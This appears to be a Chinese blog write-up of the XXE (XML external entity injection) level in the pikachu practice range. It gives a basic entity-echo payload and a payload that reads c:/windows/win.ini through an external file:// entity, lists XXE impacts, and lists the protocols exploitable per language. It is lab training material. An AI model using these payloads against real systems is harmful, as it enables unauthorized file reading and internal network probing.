靶场:pikachu

环境:

系统:Windows10
服务器:PHPstudy2018
靶场:pikachu

关卡提示说:这是一个接收xml数据的api

常用的Payload

回显

<?xml version="1.0"?> 
<!DOCTYPE foo [    
<!ENTITY xxe "XXE" > ]> 
<foo>&xxe;</foo>

 执行结果

查看系统文件内容

<?xml version="1.0"?> 
<!DOCTYPE foo [    
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" > ]> 
<foo>&xxe;</foo>

 执行结果

XXE的危害:

  1. 文件读取

  2. 内网主机扫描

  3. 端口探测

  4. 远程代码执行

XXE漏洞可利用的协议:

  1. ilbxml2=file/http/ftp

  2. PHP=file、http、ftp、php、compress.zlib、compress.bzip2、data、glob、phar

  3. Java=http、https、ftp、file、jar、netdoc、mailto、gophar

  4. NET=file、http、https、ftp

概述

XXE -"xml external entity injection"
既"xml外部实体注入漏洞"。
概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题"
也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。

点赞(0) 打赏

评论列表 共有 0 条评论

暂无评论

微信公众账号

微信扫一扫加关注

发表
评论
返回
顶部